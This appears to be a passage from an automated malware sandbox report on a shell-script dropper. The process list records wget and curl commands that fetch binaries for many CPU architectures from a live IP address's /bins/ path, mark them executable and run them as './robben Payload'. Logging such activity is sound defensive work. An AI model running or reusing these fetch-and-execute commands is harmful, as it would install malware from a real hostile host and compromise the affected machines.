US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsel-20240611-en

Max time kernel

231s

Max time network

232s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-26095d1add1b47e9833694eda255f6a0-systemd-timedated.service-6LrYtP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A